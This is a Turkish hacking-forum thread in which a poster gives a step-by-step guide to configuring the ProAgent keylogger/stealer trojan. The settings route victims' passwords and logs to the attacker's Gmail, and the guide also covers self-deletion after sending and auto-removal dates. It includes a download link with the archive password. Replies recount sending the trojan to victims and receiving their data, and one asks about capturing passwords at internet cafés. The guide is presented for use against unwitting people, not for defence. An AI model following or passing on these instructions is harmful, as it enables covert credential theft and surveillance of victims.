ProAgent'ta mail Problemine SON !! "Gelişmiş Ayarlar"la artık Hiçbir sorun Kalmayacak

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Ya Turk_Hard Yardım et

YAw Ben PRoagenti İndirdim...

BEnım mailime 5 dk da bir mail gelmesini istiyom nasıl ayarlandıgını Yazarsan sevinirim Bİde YAhoo Maili Kullanıyorum BUnun Smtp server ve smtp port u nedir Yardım edermisin.

Yaaaw Bana Hiç Gelmiyo Dediklerinide Aynen Yaptım .... Cevaplarsan sevinirim :D

Usta Bana gmail e geLmedi onu nası yapcaz aciL cevap pLs

Usta karşı Tarafın pc sine girme hakkında hiç bi bilgi yok

Usta Bana gmail e geLmedi onu nası yapcaz aciL cevap pLs

Usta karşı Tarafın pc sine girme hakkında hiç bi bilgi yok

ProAgent'la pc'ye girmezsin, karşı tarafın şifrelerine, kayıtlarına vs.. ulaşırsın..

gmail'de problem var, bir yollayıp bir yollamıyor.. sorun sizde değil yani..

Deneyip çalıstıtabilen beri gelsin gmail-yahoo-hotmail hikaye test mesaji gelmior hersey uygun kac defa smtp degstrdim yok yok yok.Bunun kesin 1cevabı yok mu gmail mi yahoo mu o ve hangi smpt hangi numara lutfen yardım...

bn denedim bu gene mail atmıyor

turk_hard çalıştıramadım msn adresimi eklermisin --------- rica etsem yardımcı olurmusun :S

turk_hard acil yardım edebilirmisin yardımcı olursan çok sevinirim :(

ya beyler bende proagent kullanıyorum ama mail bi geliyor bi gelmiyor

yahoonun stmp ve portu ne ya ne yazcaz bı yardımcı olun

Çok saolasın türk_hard mail gönderiyor suan spam bölümüne emeğine sağlık

((ProAgent Detaylı Anlatımı İçin TIKLAYIN!))

Trojan ve keylogger/stealer'larımızı yenilemeye, sorunları gidermeye devam ediyoruz!

Pek fazla kullanıcı tarafından bilinmeyen proagent gelişmiş ayarları ile mail problemini ortadan kaldırıyoruz artık..

Döküman tamamen tarafıma, yani TuRK_HaRD'a aittir bu arada..;)

İhtiyacımız bir tek Gmail mail adresi

Resimli anlatıma başlayalım.. İlk olarak programımızı açalım (Download linki aşağıda..)

ve "Select Language"den dilini "Türkçe"ye çevirelim ki daha anlaşılır olsun:

proagent_1.jpg

Ardından "Gelişmiş Ayarlar" menüsünden "Ayarlar"a tıklayalım:

proagent_2.jpg

Önemli kısım burası.. Alttaki resimdeki gibi "Benim smtp Serverımı kullan" ve

"Farklı bir smtp protu kullan" kısımlarına tik atalım.. Ve smtp server adresimizi ve portunu girelim:

proagent_3.jpg

İstersek yine bu ayar sayfasında "Mail Gönderme" bölümünde,

kurbanın bilgisayarından kayıtların bir kere gönderilmesini, ardından server'ın silinmesini ayarlayabiliriz..

Yine server için bir kaldırılma tarihi belirleyebilirsiniz ("Otomatik Kaldırma" bölümünden)

Gmail'in "SPAM" klasörüne bakıyoruz.. ve işte test maili gelmiş;)

proagent_gmail.jpg

Böylece artık "Proagent'tan mail alamıyorum", "Test mesajı bile gelmiyor",

"Mail servisi çalışmyor" yakınmalarından kurtulmuş oluyoruz..

ProAgent v2.1 SE Download = http://rapidshare.com/files/39457145/ProAgent-v2.1.9-S.E__by_TuRK_HaRD.rar

rar şifresi = turk_hard

kolay gelsin, iyi çalışmalar herkese..;)

(BU DÖKÜMAN TAMAMEN TARAFIMA (TuRK_HaRD'a) AİT OLUP LÜTFEN İZİNSİZ KOPYALAMAYINIZ..)

Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..

selam

ilk gönce tsk verdin bilgiler icin.Ben aynen orta tarif edin gib yaptim dün.Bana bir kere test emial gelti.........ve birisine server yollamdim zip datei olarak.ve 5daika sonra bana emial geldi ve bilgiler geldi hangi bilgisayar kulandini ve öyle seyler.ama msn sifresi gelmedi.ve bir kisi daha gönderim oda acmis ama hic birseyler gelmedi bana....birdaha test emial yaptim ama gelmedi..programm tam olarak calismiyor..acaba baska programmlar varmi daha.bugün de denedim test emial yok gelmiyor..programmda ariza var tam olarak calismiyor..baska programmler varmi

tsk

kardes emegine saglık ama calısmıo tüm ayarları dooru sekilde yaptım ne test maili nede normal mail gelio bi sorun war galiba yardımcı olursan sewinirim

selam

benim sorum su olacakti.Karsi tarafa(kurbana) server yoladimiz zaman ...ve kurban servere alti ve acti....mail gelmesi lazim.onu ben anatim.ama kurban server silti diyelim ozaman mail yine geliyormu--bu konuda bilgi istiyorum...ve progagent ben dün yine denedim.malesef olmuyor ne test email gelmiyor..ama yaziyor test email gitmistir diyor ama yok.....

acaba baska programmler varmi yüzde yüz calisan.....okatar programm denedim ama malesef hic biri calismiyor tam...besela server göndercem kendim acdima ne olur bunu bilen ve deneyen varmi

evet gönderio dio ama email girip bakınca hiç yok yani GELMİYOR..Gende saol gönderio demesi bile GüzeL..

yau bunun serverini int cafede kendimiz acarsak keylog ozelligi calısırmı
keylogger gibi alabilirmiyiz sifreleri?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri